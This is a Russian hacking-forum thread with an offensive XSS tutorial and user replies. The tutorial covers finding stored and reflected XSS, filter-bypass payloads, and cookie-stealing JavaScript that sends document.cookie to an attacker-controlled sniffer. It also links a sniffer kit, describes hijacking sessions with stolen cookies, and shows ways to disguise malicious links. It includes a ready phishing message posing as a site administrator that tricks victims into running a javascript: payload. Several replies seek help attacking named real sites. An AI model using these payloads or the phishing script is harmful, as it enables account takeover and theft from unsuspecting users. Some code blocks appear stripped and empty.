PDA

Просмотр полной версии : XSS [Mega Big Bug]


M@ZAX@KEP
14.05.2010, 01:00
Спойлер
Предисловие: первое, что бросается в глаза в разделе уязвимостей - большое количество качественного материала по SQL-Injection. А вот про такую полезную и, казалось бы, не особо сложную багу, как XSS, почти ничего приличного не нашлось... ух, держите меня семеро, буду писать! :ag:
ЗЫ без базового понимания html просьба не читать! Сначала курим html!

XSS

XSS - Cross Ste Scripting (CSS уже занято Cascade Style Sheets). Уязвимость, возникающая вследствии недостаточной фильтрации вводимых пользователями и в дальнейшем отображаемых на страницах сайта данных. Позволяет разместить непосредственно на страницах сайта произвольный html-код (соответственно, код будет выполняться у всех пользователей, зашедших на страницу).
Давайте подумаем, что значат для нас такие возможности. Что можно сделать интересного при помощи html. Ну, во-первых, можно просто нашалить: вывести надпись огромных размеров (да любые возможности форматирования текста в html) или поставить редирект на другой сайт (на фейк, естественно ;) ). Редирект, если что, делается так:

code:



. Можно также залить эксплойт или выполнить какой-либо javascript-код (как говорится, где html, там и яваскрипт). Выполнение нашего js-кода в свою очередь, даёт возможность позаимствовать аутентификационные данные пользователя - cookies (они же куки, кукисы и печеньки). Это временные файлы, которые сохраняются в браузере пользователя после авторизации. В некоторых случаях можно подставить заимствованные куки вместо своих и таким образом авторизоваться на сайте от чужого лица. Но пока не это для нас главное. Сначала уязвимость нужно... найти!

Поиск уязвимости

Для того, чтобы обнаружить xss, нужно проверить на её наличие все потенциально уязвимые элементы сайта. В данном случае таковыми являются поля ввода текста, который в последующем будет отображён на страницах сайта (принтабельные поля). Это могут быть поля отправки сообщения, темы сообщения и т.п. Следует проверять на наличие уязвимости каждое такое поле. Для этого поизводим последовательно всё нижеописанное до тех пор, пока не увидим аналогичное сообщение:
IMAGE (https://hpc.name/redirector.html#http://hacker-school.ucoz.ru/img/xss/1.png) http://hacker-school.ucoz.ru/img/xss/1.png

Итак, начинаем искать - подставляем во все принтабельные поля следующий код:

code:

alert('')

Ничего? Ок, пробуем так:

code:

">alert('')

Опять ничего!? >[/B]. Без них код работать, ясное дело, не будет... Они убили скрипт! Сволочи! xD Фильтрация этих символов означает одно: активной xss здесь нет. Но не отчаиваемся, ещё есть вариант с пассивными xss и даже есть шанс обойти фильтрацию! Но об этом чуть позже (см. дополнения).
Если всё же вам удалось лицезреть сообщение, значит вы нашли уязвимое поле! Ура, товарищи!

Эксплуатирование XSS

Для того, чтобы найти уязвимость, мы использовали код alert(''), который выводил пустое сообщение. Теперь, когда уязвимость найдена, можно заменить этот код на тот, который нужен нам. В описании уязвимости я говорил о том, что можно сделать. Вообще, в данном случае ваши возможности ограничены лишь возможностями html и javascript. Но особо хотелось бы осветить вопрос похищения аутентификационных данных пользователя (кукис). Кукис - временные файлы, передаваемые пользователю сервером при входе с целью дальнейшей его идентификации (дабы не вводить пароль при каждом обновлении страницы). Иногда они могут содержать логин и\или пароль пользователя в зашифрованном виде. Этот способ взлома основывается на том, что пользователь (а точнее один из видов xss-уязвимости) выполняет в браузере определённый код. Этот код выполняет запрос на сниффер в виде куков жертвы. Так кукис приходят на сниффер. Важное условие - жертва должна быть авторизована на сайте (должна была получить кукис, которые отправляет скрипт).
Возможно, вам не даёт покоя слово сниффер?

Цитата:

Сообщение от Wikipedia

Анализатор трафика, или сниффер (от англ. to sniff — нюхать) — сетевой анализатор трафика, программа или программно-аппаратное устройство, предназначенное для перехвата и последующего анализа, либо только анализа сетевого трафика, предназначенного для других узлов.

Помимо снифферов сетевых устройств, есть ещё и http-снифферы. Они предназначены для ловли и записи http-запросов, отправленных им, а также ip-адреса и версии браузера пользователя, отправившего запрос. В нашем случае таким запросом на сниффер будут приходить cookies жертвы.
Итак, нам нужно заиметь сей инвентарь - http-сниффер. Качаем (https://hpc.name/redirector.html#http://hacker-school.ucoz.ru/files/Sniffer.rar) и ставим сниффер моей сборки... (MX-software proudly presents... эм, так, о чём это я...) и внимательно там читаем инструкцию по установке! Кстати, советую сначала обкатать и изучить всё на локалхосте (просто так в сто раз быстрее). Ок, начинаем настройку и установку сниффера:
Спойлер

Где-то на просторах тырнета нашёл простенький (читай: примитивный) сниффер по типу того, что стоит тут на HPC (https://hpc.name/sniffer/) (ну нет, тут не примитивный :smartass: ) и решил его немного модифицировать... после недолгого шаманизма сделал из примитивного сниффера простенький сниффер, но главное - добавил страничку с кодами для кражи кукис! :yahoo:

Собственно, качаем (ссылка чуть была выше), настраиваем логин и пасс в файле config.php (по-умолчанию: login;pass), в файле codes.htm и script.js замените все строки "yourhost.com" на ваш хост (тупо заменой по всему документу), ещё можете в файл yourimage.gif сохранять любую вашу .gif картинку (по-умолчанию там пустая картинка). Теперь весь этот хлам заливаем на хост (на файл base.txt права 777 не забываем ставить!) и юзаем на здоровье!

В чём тут ссуть? Да где стоят, там и... ой.. ну всмысле суть в том, что url вашего личного сниффера антивирусниками палиться не будет! :banana:

Поставили? Вот и всё, уже можно юзать!... ах, да, вы, может быть, не умеете?... но ничего, сейчас объясню! :hmcool:

Использование http-сниффера

(Кто умеет, всё равно гляньте по-быстрому, может что нового поймёте =) )
Итак, заходите на сайт, где находится ваш сниффер. Знакомимся с интерфейсом: есть дата и время зачем-то ещё наш ip. За ними кнопочка обновления лога. А ещё есть таккая штука, как картинка сниффера. Имя её в моей сборке - s.gif Вот именно через обращения к этой картинке сниффер и ловит все запросы. Откройте эту самую картинку (yourhost.com/s.gif) и обновите лог. Видите новую запись? В нашем распоряжении время совершения запроса, ip того, кто обратился к картинке, пустая строка запроса (QUERY), реферер (с какого сайта совершено обращение к картинке) и агент (т.е. браузер) пользователя. Теперь попробуйте к ссылке на картинку дописать что-нибудь после знака "?". Например, так:
code:

http://yourhost.com/s.gif?шо за нах o_O!

Обновляем, смотрим строку запроса (QUERY). Вывод: сниффер запишет всё, что было после ? (это и есть запрос).
Итак, если вы нашли xss, вам нужен код, крадущий кукис. Каждый раз при открытии страницы с этим кодом, он будет отправлять на сниффер куки от этой страницы. Для обычной активной xss, рассматриваемой в этом уроке код будет таким:

code:

img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cookie;

Можно так же сделать так, чтобы после выполнения кода происходил редирект (переадресация) на другую страницу:

code:

img = new Image(); img.src = "http://yourhost.com/s.gif?"+document.cookie;
location.href ="http://адрес_редиректа/"

Не забудьте заменить yourhost.com на адрес вашего сниффера во всех кодах!
Вот о чём чуть не забыл! Все эти коды я для удобства присобачил к снфферу, найдёте их там по ссылке "коды для кражи кукис"!
Дальше идут очень важные факты, которые нужно чётко понимать.
Если пользователь не авторизован на сайте (не вошёл под своим логином и паролем) - у него нет кукис. Если куков нет - будет отправлена пустая строка. Нельзя получить кукис от другого сайта или сервера (например, на ucoz_е кукис с аутентификационными данными находятся на другом сервере и как бы на другом сайте). Кукис имеют ограниченный "срок годности": по истечении их времени действия на сервере будет изменён номер сессии для данного пользователя и кукис станут "недействительными". Время действия может быть различно в зависимости от настроек сервера или пользовательских. Сессия может быть закрыта так же вручную пользователем, например при нажатии кнопки "выход" на сайте. Иногда в кукисах хранятся зашифрованные логин и/или пароль пользователя (о способах их расшифровки - чуть позже).
Предположим, вам удалось получить кукисы жертвы. Что же теперь с ними делать? Будем подставлять их вместо своих! В Mozilla Firefox такой возможности нет, будем юзать Opera. Заходите на тот самый сайт под своими логином и паролем, дабы создать папку с куками. Теперь топаем в инструменты --> дополнительно --> управление cookies.
IMAGE (https://hpc.name/redirector.html#http://hacker-school.ucoz.ru/img/xss/2.png) http://hacker-school.ucoz.ru/img/xss/2.png

Тперь нужно найти папку нужного сайта и заменить наши куки на те, которые пришли на сниффер. Думаю, здесь нет ничего сложного. Кукис приходят в виде имя=значение;. А в папке как раз список имён. Двойной щелчок - открывается окошко. Заменяем поле "значение" и тыкаем ок. Так пока не заменим всё, что нам пришло. Теперь закрываем управление cookies и обновляем страницу. Если всё сделали правильно - вы станете тем, чьи куки подставили (войдёте в его аккаунт)!

Дополнение 1

Поиск и обход фильтров

Освежим в памяти один момент из основной части статьи:

Цитата:


Смотрим сурс (исходник) странички и ищем там что-то похожее на код выше (тоесть ищем то, что мы туда внедрили). Нашли? Смотрите, что стало с нашим кодом. Скорее всего, были отфильтрованы спец-символы . Без них код работать, ясное дело, не будет... Они убили скрипт! Сволочи! xD Фильтрация этих символов означает одно: активной xss здесь нет. Но не отчаиваемся, ещё есть вариант с пассивными xss и даже есть шанс обойти фильтрацию! Но об этом чуть позже (в скором дополнении к уроку).



Во время поиска XSS вы гарантированно будете сталкиваться с подобной фильтрацией. При чём фильтроваться могут не только символы , но и многие другие не менее важные для проведения атаки (внедрения работоспособного кода). В их числе:

code:

<>=();/""+

Проверяем фильтр

Просто ставим в принтабельное поле все нужные нам символы, а потом ищем их в исходнике страницы. Чтобы проще было искать, можно ещё добавить в середину какое-нибудь слово, напр. XSS просто для ориентира.
Нашли? Смотрите, что осталось на месте, а что "изуродовалось" фильтром.
Сразу скажу, что если эти символы (хоть какие-то из нужных нам кроме ) заменяются на что-то другое ли удаляются, оставьте все ваши тщетные попытки внедрить код!
Если же символы просто удалились, можно попробовать поставить тег (имено так называют эти скобки и ключевые слова в них), и Фильтр либо пропустит и не удалит это (ведь теперь тэг не пустой), либо отфильтрует как запрещённый тег. Если пропустил - всё шикарно, переходим к вставке нужного нам кода (код сниффера для кражи кукис, помните? ). А если тупо удалил, подставим вместо что-нибудь такое:

code:

ipt>

Скорее всего, фильтр удалит только в середине, и у нас останется рабочий тег. В случае, если снова удалились только , а осталось голое "sсript", тут явный облом и уязвимости нет.
Ну а если всё таки фильтруются не всегда? Давайте экспериментировать и попытаемся всё таки вывести сообщение (alert) с текстом!
Начнём с того, что забьём на классический и заменим его каким-нибудь другим тегом. Итак, если alert выводится так:

code:

alert('XSS')

то в вариациях с различными тегами можно попытаться встроить что-нибудь из этого:

code:



alert('XSS');



Внимание! По некоторым сведениям, код в теге IMG может не работать в браузере Mozilla Firefox, поэтому предпочтительно избегать использования этого тега.

В общем, экспериментируйте с тегами, смотрите, как они изменяются, анализируйте поведение фильтра и, возможно, найдёте рабочую комбинацию!
Из всего выше прочитанного можно сделать неутешительный вывод, что активная xss - штука тонкая и даже простому фильтру, отсеивающему только символы мы не в силах ничего противопоставить. Но ведь не каждый фильтр отсеивает , да и неопытные кодеры обычно ставят запрет как раз только на , а мы ведь знаем, что пользоваться можно не только этим тегом. ;)

Дополнение 2

Пассивные XSS

Что, думали прочитали основную статью с дополнением и на этом всё, уже всё узнали про xss? Рано радутесь! Вплоть до этого момента речь у нас шла только об активных XSS, которые встраивались в тело страницы и сохранялись. Теперь неплохо бы разобраться ещё и с пассивными XSS. Их отличие от активных состоит в том, что пассивки мы внедряем не в тело страницы, а в адресную строку, и код нашей xss не будет сохраняться на сайте, для его выполнения придётся впарить жертве ссылку с кодом. Но обо всём этом поговорим подробно чуть позже. Итак, делаем умное лицо и начинаем вникать! xD

Поиск уязвимости

Как вы помните, для поиска активок, мы подставляли скрипт во все принтабельные поля. Теперь мы будем проводить похожий ритуал, только код будем подставлять в адресную строку (естественно, на различных страницах сайта). По поводу адресной строки поясняю...
Допустим, есть адрес _http://site.com/index.php?page=1 То, что там стоит после знака ? (page=1) - это данные, передаваемые скрипту на сервере (имя скрипта идёт перед ? - index.php) get-запросом. Сами данные имеют вид "параметр=значение" (page=1). Вот наши скрипты мы будем подставлять именно как значение (после =). Пока из прочитанного вам нужно хорошо усвоить, как выглядят адреса, в которые можно пропихнуть xss (иначе как вы будете эти уязвимости искать?), а сайты с пассивками для тренировки можно найти тут (https://hpc.name/showthread.php?t=2865).
Итак, для проверки будем подставлять после = по очереди скрипт с алертом в различных вариациях:

code:

alert('XSS')
">alert('XSS')
'>">alert(/XSS/)

Ставим после = сначала первый скрипт, жмём энтер, ждём окончания загрузки страницы. И так перебираем, пока не увидим таки вожделенное окошко алерта (картинка была выше). Если подстановка ничего не дала, курим обход фильтров (см. доп. 1).

Эксплуатирование

Когда речь шла об активках, мы с вами говорили о том, что на страницу можно было внедрить любой код. С пассивками всё обстоит точно также, но так как страница с внедрённым кодом нигде не сохраняется и может быть передана жертве только в виде ссылки вместе с xss-кодом, то чаще всего данную уязвимость используют только с целью хищения аутентификационных данных (кукис).
Итак, теперь вместо безобидного скрипта с алертом нужно внедрить крипт сниффера. Тут встают такие проблемы, как множество символов, используемых в скрипте, которые могут фильтроваться, а также значительная длина вставляемого кода. Решать будем очень просто: код сниффера разместим у себя на хосте (можно даже там же где сниффер xD), а в самой xss будет лишь вызов этого скрипта. Как же это реализовать?
Вместо значения в адресной строке (куда подставляли алерт при поиске) вставляем сей код:

code:



Важный момент: если в алерт подставляли код, где перед стояло ещё что-то (например, алерт срабатывал так: ">alert('XSS')), то это что-то (в нашем случае ">) нужно будет оставить и перед кодом сниффера!
Кстати, не забываем заменить yourhost.com в коде на реальный адрес вашего хоста, где будет лежать скрипт. А теперь что касается самого скрипта: файл script.js имеет такое содержание:

code:

img=new Image(); img.src="http://yourhost.com/s.gif?"+document.cookie;
location.href = "http://google.ru"

Где s.gif - картинка вашего сниффера, ну а про yourhost.com расскажет капитан Очевидность. хD
Вторая строка - переадресация ползователя куда-либо (в нашем случае в гугл =) ). Если хотите оставить пользователя на той же странице, где он и был, оставьте кавычки пустыми. Но не удаляйте строку редиректа! Иначе пользователь так и останется на странице с картинкой вашего сниффера и может заподозрить неладное... (не знаю что он будет делать, но зачем лишний раз палиться и тревожить нервных юзеров? xD)
Вот теперь при переходе по вашей ядовитой ссылке (которая будет иметь вид _http://site.com/index.php?page=) будет запускаться код сниффера, который, в свою очередь, запишет куки в лог, а потом либо оставит жертву в покое, либо перекинет на другой сайт.
Собственно, все коды, как и файл script.js входят в комплект поставки моего сниффера. Приятного вам хака!

Дополнение 3

Шифруем подозрительную ссылку

Ещё немного дополню... имхо давать пользователям (а тем более админам) вот такие ссылки

code:

http://site.com/index.php?page=

в открытом виде слишком палевно... вам не кажется? Сейчас будем их прятать!
Способ 1: топаем на tinyurl.com (https://hpc.name/redirector.html#http://tinyurl.com) и вбиваем туда нашу ссылку. Получаем в результате другую... короткую и загадочную :wink: А результат её работы - тот же :banana:
Способ 2: будем шифровать в base 64. Заходим сюда (https://hpc.name/redirector.html#http://base64-encoder-online.waraxe.us) и кладём в поле нашу ссылку. Жмём "Encode" и получаем:
code:

aHR0cDovL3d3dy5jLXNwYW52aWRlby5vcmcvdmlkZW9MaWJyYX J5L3NlYXJjaC1yZXN1bHRzLnBocD9rZXlbXT08U0NSSVBUIHR5 cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz1odHRwOi8vaHR0cHoucn UvZzRjdXdsNDhlZGdvLmpzPjwvU0NSSVBUPiI=

Это наша ссылка в base64. Теперь можно преподносить её жертве в виде
code:

data:text/html;base64,aHR0cDovL3d3dy5jLXNwYW52aWRlby5vcmcvdm lkZW9MaWJyYXJ5L3NlYXJjaC1yZXN1bHRzLnBocD9rZXlbXT08 U0NSSVBUIHR5cGU9dGV4dC9qYXZhc2NyaXB0IHNyYz1odHRwOi 8vaHR0cHoucnUvZzRjdXdsNDhlZGdvLmpzPjwvU0NSSVBUPiI=

Способ 3: кодируем в url ядовитую часть ссылки. Кодировать можно тут (https://hpc.name/redirector.html#http://meyerweb.com/eric/tools/dencoder/). Получим ссылку такого вида:
code:

http://site.com/index.php?page=%3CSCRIPT%20type%3Dtext%2Fjavascrip t%20src%3Dhttp%3A%2F%2Fhttpz.ru%2Fg4cuwl48edgo.js% 3E%3C%2FSCRIPT%3E%22

Во всех 3 случаях результат работы и способ применения ссылки один и тот же. Не забывайте, что при этом ещё необходимо правильно применить СИ, чтобы жертва перешла по ссылке, находясь на атакуемом сайте!

Дополнение 4

Самодостаточные XSS

Наконец-то добрались до последнего вида xss! По технике проведения атак эти xss, пожалуй, самые простые. Здесь не нужно искать никаких уязвимостей, здесь не нужно бояться фильтрации на сайте и заботиться о её обходе, здесь для проведения атаки кроме доверчивой жертвы вообще ничего не нужно (и это, блин, главный минус). Суть атаки заключается в том, что мы впариваем жертве ядовитый код с картинкой сниффера, как и раньше, она вставляет код в адресную строку, чтобы он выполнился, но...
1) этот код - не ссылка, поэтому будет работать с любого сайта. То есть жертва может запустить код вообще в новом окне и никаких кукисов не придёт((
2) жертва может заподозрить неладное, когда нельзя просто нажать на ссылку, а нужно её в адрес копировать.
Хотя эти проблемы легко решаются при помощи СИ (социальной инженерии). Можно, например сказать так:

Цитата:


Ой, смотри какой прикол нашёл на ! =) Вот если в адрес вставить там вот это:
Короче, не скажу, а то так не интересно ;)



Но это если жертва... блондинко\тупая\любопытный пацанчик (нужное подчеркнуть). Хотя любопытство очень часто берёт верх над здравым смыслом... даже если здравый смысл говорит: "ссылка не знакомая... ненадо!...хотяяяя..." Если ваша цель - менее падкий на всякие "глупые прикольчики" человек, можно предложить такой вариант:

Цитата:


Добрый день, уважаемый username!
Вы получили это сообщение, потому что зарегистрированы на сайте таком-то.
Сегодня приблизительно в 2:00 произошёл сбой сервера СУБД (чем больше умных слов, тем лучше!). Причины сбоя не известны, на данный момент существует предположение о том, что сервер подвергся хакерской атаке. Так как на сервере находилась база логинов и паролей пользователей, возможно хищение пользовательских данных.
С целью защиты личных данных пользователей, все аккаунты, которые не пройдут процедуру подтверждения и смены пароля, будут удалены втечение суток. Пожалуйста, пройдите процедуру подтверждения, это не займёт у вас много времени: (смягчаем угрозу удалить аккаунт вежливой просьбой =) )
1) Проверьте, можете ли вы авторизоваться на сайте используя ваши логин и пароль. (тут можно для верности ещё ссылку на фейк :wink
2) Смените ваш пароль. (делать это не обязательно, но настоятельно рекомендуем сменить пароль для вашей безопасности!)
3) Вставьте код подтверждения в адресную строку, находясь в вашем личном кабинете на сайте.
Код подтверждения:
========================

========================
Внимание! Не завершайте вашу сессию на сайте (при помощи кнопки выхода) некоторое время или до завершения проверки всех аккаунтов, иначе ваше подтверждение может аннулироваться. Об окончании проверки все пользователи будут извещены по e-mail.

Благодарим за сотрудничество.\спасибо что вы с нами! (по вкусу)
Администрация какого-то сайта.

_______________
Это сообщение отправлено автоматизированной системой рассылки, отвечать на него не нужно.



Итак, это были просто примеры применения СИ в этой ситуации, думаю с впариванием кода всё ясно. =)
Что-то меня занесло в другую тему и я отвлёкся (ну ничего, это тоже может пригодиться)...
Всётаки вернёмся к сути... как вы уже поняли, код выполняется при вставке в адресную строку и нажатии на Enter. Попробуйте вставить это (знакомый код, а? =) ):

code:

javascript:alert('')

Думаю, много пояснений не нужно, вот сам код (в моей сборке сниффера он есть):

code:

javascript:document.write('img=new Image();img.src="http://yourhost.com/s.gif?"+document.cookie;location.href=""')

Если хотите после выполнения кода оставить пользователя где он был, то так этот скрипт и сделает)) А если надо добавить редирект, допишите после 2 фразы location.href адрес, куда нужно редиректить. Например, так:

code:

javascript:document.write('img=new Image(); img.src="http://yourhost.com/s.gif?"+document.cookie; location.href="http://адрес_редиректа/" ')

А ещё, если вы использовали легенду о "коде подтверждения", можете в конец этого скрипта дописать что-нибудь такое (чтобы успокоить взволнованного пользователя):

code:

;alert('Аккаунт подтверждён успешно! #Код200')

Для меньшей палевности адресов и большей загадочности кода (чтобы у юзеров отпало желание разбираться), можно воспользоваться точно теми же методами шифрования, что были приведены в дополнении 3.

Почему в этой части уделил так много внимания СИ? Да потому, что в случае с самодостаточными xss сложностей по технической части чуть меньше чем нихрена, а самое главное - ненавязчиво, но понятно и убедительно объяснить жертве, куда и как вставлять код.
Ну чтож, вперёд на сервисы анонимной отправки почты рассылать наш код! xD

//Отсюда был вырезан кусок бреда. (от 29.03.2011)

Итак, что же мы теперь умеем:

Искать и применять активные xss-уязвимости

Обходить некоторые простые виды фильтрации

Пользоваться http-сниффером

Красть аутентификационные данные пользователя через xss

Подставлять эти данные для авторизации от лица жертвы

Находить и использовать пассивные xss

Шифровать ссылки с xss-кодом

Проводить самодостаточные xss атаки

Впаривать код сниффера с приминением элементарных приёмов СИ

Мда, немало нового освоили... надеюсь! :shifty:

M@ZAX@KEP
22.05.2010, 01:00
->Видео к статье! (https://hpc.name/redirector.php?url=http%3A%2F%2Fdepositfiles.com%2 Ffiles%2F0el93vmjm)
Рассмотрены темы активок, настройки сниффера, шифрования ссылок и самодостаточных xss.
Правда, с шифрованием ссылок вышел маленький косячок. Но, думаю, не должен помешать усвоению материала. =)

ЗЫ Не думал что нормально записать видео окажется так сложно и придётся делать 10 дублей))
ЗЗЫ надеюсь, музыка мешать не будет, хотя её там почти не слышно... xD

maks999000
23.05.2010, 01:00
перезалил видео тык (https://hpc.name/redirector.html#http://narod.ru/disk/21050170000/%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE%20%D0%BF%D0%BE%20XS S.7z.html)

stan_q
03.06.2010, 01:00
TC, а как юзать XSS, если фильтрация отсутствует при вводе в принтабельное поле, и при этом ссылка на страницу не меняется? Не могу понять, что мне надо делать дальше, чтобы получить печеньки юзера?

Алла
04.06.2010, 01:00
А как сделать xss фрейм на странице под этот сниффер? Чтобы жертва перешла допустим по ссылке на фейк и куки пришли на сниффер?

M@ZAX@KEP
04.06.2010, 01:00
Ссылка не всегда будет меняться, это вовсе не обязательно. Суть пассивки не в том, что код в ссылке, а в том, что он потом из адрески всё равно выведется на страницу. Пробуй крутить как простую пассиву.
Только потом придётся не ссылку пользователю впаривать, а заставлять его ввести код в уязвимое поле.
ЗЫ на яндексе мноооого подобных баг ;) (практически бестолковых)

Добавлено через 3 часа 41 минуту
Update

Обход фильтров

Наткнулся совершенно случайно на одну очень интересную статью по теме.
В статье подробно рассматриваются многие способы обхода фильтрации. Особенно рекомендую тем, кто в теме xss достаточно хорошо разобрался, так сказать, для углубленного изучения :smartass:
Кого заинтересовало - почитать можно тут. (https://hpc.name/redirector.html#http://www.xakep.ru/magazine/xa/130/062/1.asp)

stink200
05.06.2010, 01:00
что делать я уже не знаю ставлю пароль в config.php захожу на сайт ввожу пароль а он меня не пускает, подскажите что я не так делаю

M@ZAX@KEP
05.06.2010, 01:00
Цитата:

Сообщение от Алла

А как сделать xss фрейм на странице под этот сниффер? Чтобы жертва перешла допустим по ссылке на фейк и куки пришли на сниффер?

Куки от чего? Если жертва перейдёт на фейк, то от фейка куки и придут (а их там нет вообще xD)
Если надо чтобы сначала пёрлись куки, потом кидало на фейк, при чём всё это было ссылкой, то нужно искать пассивку на атакуемом ресурсе. И давать жертве код для пассивок с редиректом- то бишь в моём сниффе в файле script.js на второй строчке вместо гугла ставишь адрес твоего фейка.
Можно ещё дать код для адресной строки с редиректом (в сниффере ищи этот код, там разберёшься :smartass

Цитата:

Сообщение от stink200

что делать я уже не знаю ставлю пароль в config.php захожу на сайт ввожу пароль а он меня не пускает, подскажите что я не так делаю

Хм... там всё работает как часы, у меня только 2 варианта происшедшего:
1) ты когда пароль ставил кавычки стёр, а пароль должен быть в кавычках обязательно.
2) у тебя в пароле русские символы... хотя должно их поддерживать, но попробуй сделать только цифрами для начала.

crys01
05.06.2010, 01:00
Цитата:

Сообщение от jean12

где скачать снифер что показан на видео ?

А че статью не читаем?

Цитата:

Сообщение от M@ZAX@KEP

http-сниффер. Качаем (https://hpc.name/redirector.html#http://2d-portal.ucoz.ru/files/Sniffer.rar)

сергей1980
05.06.2010, 01:00
Может мой пригодится(переделал от каника) http://depositfiles.com/files/jsnjf8h99 (https://hpc.name/redirector.html#http://depositfiles.com/files/jsnjf8h99)

jonyyy
19.06.2010, 01:00
http://smartu.net/admins (https://hpc.name/redirector.html#http://smartu.net/admins) -- как сдесь правильно сложить ссылку...мне почемуто куки приходят всего один раз(((((

M@ZAX@KEP
20.06.2010, 01:00
Эм... а какую ссылку ты составлял? Чтобы была ссылка (с пассивкой), нужно для начала саму уязвимость найти, а твоя ссылка - просто вход в админку.

stan_q
21.06.2010, 01:00
Там поле уязвимо для XSS. И скуля в пост параметре имеется

crys01
21.06.2010, 01:00
Цитата:

Сообщение от M@ZAX@KEP

Эм... а какую ссылку ты составлял? Чтобы была ссылка (с пассивкой), нужно для начала саму уязвимость найти, а твоя ссылка - просто вход в админку.

Он наверное имел ввиду вот это

Скрытый текст (вам необходимо авторизоваться):


У вас нет прав чтобы видеть скрытый текст, который находится здесь

mob_dp
22.06.2010, 01:00
http://wowcircle.com/registration.htm (https://hpc.name/redirector.html#http://wowcircle.com/registration.htm)
на этой странице отображается вся информация, которая вводится в поля после "> (закрывается html-тег ).
Ессно я предполагаю что сервер ест все что туда вписать, однако даже этот код не срабатывает почему-то:

code:

">

NITROS
23.06.2010, 01:00
А эти кукисы которые приходят, админские? или нет?

stan_q
23.06.2010, 01:00
Цитата:

Сообщение от NITROS

А эти кукисы которые приходят, админские? или нет?

Кукисы приходят того пользователя, который перешел по ссылке.

_qwe_
23.06.2010, 01:00
Ап...
Никак немогу настроить пасивку под снифер ...
кто поможет пишите в icq#: 3455173

M@ZAX@KEP
23.06.2010, 01:00
mob_dp, перечитай статью)))
Ты пытаешься выполнить php-код. Пых-пых - штука серверная и в браузере работать никогда не будет. А будет там только html, javascript.

Цитата:


я предполагаю что сервер ест все что туда вписать



И в том то и дело что сервер ни при чём, тут ты его даже не трогаешь. Ест это не серв, а как раз клиент)

Пробуемс:
code:

">alert('XSS')

M@ZAX@KEP
25.06.2010, 01:00
Дальше давать жертве ссылку на эту страницу.
Кстати, сразу скажу, что бывают такие бестолковые активки, когда они на странице не сохраняются, а работают, только если заставить жертву вбить тот самый код в уязвимое поле (хз как заставить xD). Смысл есть только в таких активках, которые есть, например, в полях добавления комментария или отправки сообщений, т.е. когда введённый вами текст сохранится в БД и будет отображаться на некоторой странице всегда, так же, как сейчас отображается это сообщение))
ЗЫ надеюсь, так понятнее изложил суть активки? =)

Shade
25.06.2010, 01:00
С пассивками я всё понял, а вот с активками чё то не врубаюсь. Допустим я вписал в поля alert('') вышло окошко с сообщением. Это значит что тут есть активка дальше берём код который будет брать куки и вписываем его вместо alert(''), что дальше делать? Скажите что дальше делать!

Добавлено через 2 часа 6 минут
Народ, но кто нибудь подскажите что делать дальше?

vonkolot
08.07.2010, 01:00
M@ZAX@KEP,у меня вопрос....какой сервер лучше всего поставить на машину под сниффер?? я имею ввиду про localhost))

stan_q
08.07.2010, 01:00
Цитата:

Сообщение от vonkolot

какой сервер лучше всего поставить на машину под сниффер?? я имею ввиду про localhost))

Т.к. ТС в отъезде, отвечу. Лучше не увлекаться сборками типа Denwer, т.к. они зачастую очень сильно порезаны в функционале. Лучше устанавливай стандартную связку apache+php, и будет тебе localhost.

maks999000
08.07.2010, 01:00
Цитата:

Сообщение от vonkolot

M@ZAX@KEP,у меня вопрос....какой сервер лучше всего поставить на машину под сниффер?? я имею ввиду про localhost))

вот это ставь Apache 2.2.15 + php 5.3.2 скачать (https://hpc.name/downloads.php?do=file&id=3077)

Цитата:

Сообщение от stan_q

Т.к. ТС в отъезде, отвечу. Лучше не увлекаться сборками типа Denwer, т.к. они зачастую очень сильно порезаны в функционале. Лучше устанавливай стандартную связку apache+php, и будет тебе localhost.

а почему такая не любовь к дэнверу то? =) для определенных целей отличный софт, просто, быстренко!

stan_q
08.07.2010, 01:00
Цитата:

Сообщение от maks999000

а почему такая не любовь к дэнверу то? =) для определенных целей отличный софт, просто, быстренко!

Не то, чтобы не любовь. Софт отличный с точки зрения установки (никакой мороки), но предпочитаю ставить полноценную систему, включающую все модули\подпрограммы\надстр ойки и пр. Хз, когда что понадобится

crys01
09.07.2010, 01:00
M@ZAX@KEP, помоги советом. Есть сайт,на нем работает активка, но работает пока гость а под пользователем работать не хочет. Есть какие соображения, в чем может быть головняк?

NITROS
11.07.2010, 01:00
Цитата:

Сообщение от crys01

M@ZAX@KEP, помоги советом. Есть сайт,на нем работает активка, но работает пока гость а под пользователем работать не хочет. Есть какие соображения, в чем может быть головняк?

Ну кукисы вроде-бы же сохраняются вот и юзай эту возможность

crys01
11.07.2010, 01:00
Цитата:

Сообщение от NITROS

Ну кукисы вроде-бы же сохраняются вот и юзай эту возможность

После Logout куков нет, а пользователю эта уязвимость не страшна...
Пацаны встал такой вопрос, в общем я все таки расковырял сайт, и нашел возможность через jpg выполнить скрипт(подменить jpg на php)
Вопрос: можно ли в php скрипт вписать код который ворует куки не имея XSS, (по идее он должен выполнится)если можно подробней, или есть более интересные варианты как мне его докрутить?

pseudonym
12.07.2010, 01:00
Подскажите какой-нибудь сайт с уязвимостью, а то что-то не знаю даже на чём попробовать то.

Ixacker
12.07.2010, 01:00
Цитата:

Сообщение от pseudonym

Посоветуйте какой-нибудь сайт с уязвимость, а то что-то не знаю даже на чём попробовать то.

Ну набери в поиске нашего форума Пассивные или Активные xss! Там много будет рабочих и не рабочих. Посмотри на icq.

pseudonym
12.07.2010, 01:00
у кого-нибудь ещё возникала проблема со сниффером мазахакера?
у меня тоже не получается залогиниться. бесконечно логин и пароль спрашивает.

stink200
13.07.2010, 01:00
Цитата:

Сообщение от pseudonym

у кого-нибудь ещё возникала проблема со сниффером мазахакера?
у меня тоже не получается залогиниться. бесконечно логин и пароль спрашивает.

открой папку config.php и там снизу будет
user = "тут будет логин";
$password = "тут будет пароль";
копируй без ковычак

pseudonym
13.07.2010, 01:00
Нуу..я не настолько тупой. Вот как выглядят эти строчки в конфиге:
Спойлер
IMAGE (https://hpc.name/redirector.html#http://funkyimg.com/u2/822/241/1_PNG.png) http://funkyimg.com/u2/822/241/1_PNG.png

захожу на сниффер, ввожу данные и он запрашивает их снова..

stink200
13.07.2010, 01:00
pseudonum логин
password пароль
должно работать
дай ссылку на снифер сам попробую зайти

NITROS
14.07.2010, 01:00
https://hpc.name/redirector.php?url=...es%2F82so39l4x (https://hpc.name/redirector.php?url=http%3A%2F%2Fdepositfiles.com%2 Ffiles%2F82so39l4x)
и что это ты за ссылку дал блиН?

crys01
